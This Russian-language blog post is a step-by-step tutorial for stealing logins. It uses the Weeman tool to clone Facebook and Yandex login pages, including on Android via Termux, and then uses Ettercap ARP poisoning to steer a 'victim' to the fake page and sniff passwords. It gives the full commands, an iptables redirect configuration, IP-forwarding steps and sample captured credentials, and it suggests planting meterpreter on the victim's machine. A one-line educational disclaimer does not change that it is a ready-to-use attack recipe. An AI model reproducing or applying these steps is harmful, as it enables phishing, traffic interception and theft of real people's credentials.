February 7, 2021

Фишинговый сайт за 5 минут

Сегодня мы раскажем о простом, но очень полезном инструменте, которое поможет поднять любой фишинговый сайт на коленке и за 5 минут!

Бонусом мы расскажем, как сделать тоже самое со своего Android смартфона, а так же, как сделать более мощную атаку, используя Ettercap.

Внимание! ниже изложенная информация дана исключительно в образовательных целях и не является призывом к действию.

Weeman является простым python HTTP сервером, который создает фишинг страницы. Он принимает данные, введенные пользователем, и проверяет регистрационную информацию.

Приступим

Сначала давайте рассмотрим зависимости:

1. python 2.7;

2. pip2;

3. python-dev.

Установка

Сначала надо клонировать его к себе на ПК:

git clone https://github.com/evait-security/weeman.git

Перейдем в директорию weeman:

cd weeman

И запускаем weeman.py:

sudo python2 weeman.py

После запуска видим такую картину.

Итак, начнем создание фишинг сайта.

Сначала выберем наш сайт:

set url https://www.facebook.com

Выберем порт:

set port 8080

И напишем куда после этого будет направлять пользователя:

set action_url https://www.facebook.com

И запуск:

run

Потом если кто-то зайдет и введет свои данные мы увидим примерно такую картину:

email => 123456789@gmail.com
pass => 123456789

Для того, чтобы подложить жертве этот сайт мы можем воспользоваться приложением вроде Ettercap или LanGhost для совершения атаки посредника.

Благодаря этому, мы получим возможность перехватывать и анализировать его трафик и даже отправлять собственный трафик в его компьютер. Другими словами, из-за того, что он подключился к нашей точке доступа, мы получили полный контроль над всеми входящим и исходящим данными.

Кроме этого, мы сможем перехватывать электронные письма и пароли к другим приложениям и сетям. При желании, мы даже можем внедрить в его систему meterpreter или другое приложение для прослушки, если хотим получить больше информации.

Ettercap

Ettercap – open source утилита для анализа безопасности компьютерных сетей. Основное предназначение которой – MITM атаки (Man In The Middle attacks – атаки типа “человек по середине”). Имеет возможность sniffing of live connections, фильтрация контента на лету, а так же много других интересных возможностей. Поддерживает как активные, так и пассивные вскрытия протоколов и включает большое количество функций для анализа сети и узла.

Более подробную информацию, можно найти на официальном сайте Ettercap.

Установка/Настройка Ettercap

Скачать и установить Ettercap можно из исходников – здесь. В качестве альтернативы можно воспользоваться следующей командой:

apt-get install ettercap-gtk ettercap-common

Прежде чем приступать к выполнению, выполним небольшую настройку. Открываем файл /etc/etter.conf:

nano /etc/etter.conf

Находим в нем вот эти строки и раскомментируем их:

# if you use iptables:
 redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

После того, как все перечисленные выше операции сделаны, запускаем Ettercap. Однако у некоторых, в том числе и у меня, Ettercap работать не будет. Будут появляться ошибки вида “SEND L3 ERROR“. Чтобы такие ошибки не появлялись, воспользуйтесь следующей командой:

# echo "1" > /proc/sys/net/ipv4/ip_forward
# cat /proc/sys/net/ipv4/ip_forward  

Теперь все должно работать нормально и ошибки не должны выскакивать.

Перехват паролей

Для начала посмотрите на архитектуру сети (см. рисунок ниже), которая будет использоваться. Это нужно для того, чтобы вы хорошо понимали, что и от куда берется.

Запускаем Ettercap:

# ettercap -G

Перед нами появится окно приложения, как показано ниже.

Щелкаем по кнопке Sniff -> Unified sniffing. После этого выбираем интерфейс, который используется. У меня это eth0.

В верхнем меню нажимаем кнопки HostsScan for hosts.

Теперь опять щелкаем HostsHosts list. Появится окно, как показано на рисунке ниже.

Здесь нам нужно выбрать цели, т.е. выбрать машину, которая будет выступать в качестве “жертвы” и шлюз. Как видно из архитектуры сети, которую используем, в качестве “жертвы” выступает машина с IP-адресом = 192.168.1.3. Ну а в качестве шлюза IP-адрес = 192.168.1.1. Поэтому выбираем 192.168.1.3 и нажимаем кнопку Add to Target 1. Теперь щелкаем 192.168.1.1 и нажимаем кнопку Add to Target 2.

Далее щелкаем MitmARP poisoning. После этого выбираем Sniff remote connections.

Нажимаем ОК. Осталось только запустить. Для этого нажимаем на кнопку StartStart sniffing.

Sniffing запущен. Осталось подождать, когда пользователь будет вводить свои данные, например от почтового аккаунта.

Как только он ввел свои логин/пароль и успешно вошел на свой почтовый ящик, злоумышленник также успешно перехватил его логин и пароль:

HTTP : 94.100.184.17:443 -&gt; USER: <strong>my_testing_akk</strong>  PASS: <strong>my_secret_password</strong>  INFO: http://mail.ru/

Бонус

Для запуска Weeman на вашем Android устройстве мы будем использовать консоль Termux. Многие называют Termux лучшим эмулятором linux, солидарен. Скачиваем и открываем. Для удобства использования терминала советую скачать дополнительную клавиатуру Hacker's Keyboard, позже поймёте для чего.

Начинаем подготовку к установке, вводим в консоль последовательно две команды:

$ apt update

$ apt install

Эта операция может занять некоторое время, зависит от скорости интернета.

Далее:

$ apt install git

Появляется вопрос "Do yo want to contiune? [Y/n]". Да, мы желаем продолжить, вводим маленькую "y" (это значит yes).

Следующая команда:

$ apt install python2

Снова появиться вопрос "Do yo want to contiune? [Y/n]". Поступаем аналогично.

Этой командой мы установили python (язык программирования), на котором написан weeman.

Готово, мы установили все, что требуется для запуска weeman.

Скачаем weeman:

$ git clone https://github.com/evait-security/weeman

Отлично, пропишем команду:

$ ls

Она выводит содержимое каталогов.

Если после этой команды у Вас ничего не появилось в консоли, то попробуйте повторить пункты вверху.

Если все ок, то продолжим:

$ cd weeman

$ ls

Появились эти файлы. Запускаем weeman:

$ python2 weeman.py

У нас получилось, установка прошла успешно и мы запустили weeman.

Что бы вывести в консоль помощь по командам пишем:

$ help

Теперь надо поставить некоторые настройки (на примере Яндекса). Введём следующие команды:

$ set url https://yandex.ru

$ set port 8080

$ set action_url https://yandex.ru

Первой командой мы установили адрес сайта, который мы хотим скопировать.

Второй командной устанавливаем порт.

Третья команда определяет адрес на который будет кидать человека, предоставившего свои данные.

Прописываем show, проверяем правильность установленных настроек:

$ show

Все верно, продолжаем:

$ run

Все, готово. Сервер запущен, вот его адрес:

Копируем "http://localhost:8080" и вводим в браузер, но на телефоне (сейчас этот сервер локальный и существует только на вашем устройстве). Далее, все по аналогии с десктопом.

Всем спасибо за внимание!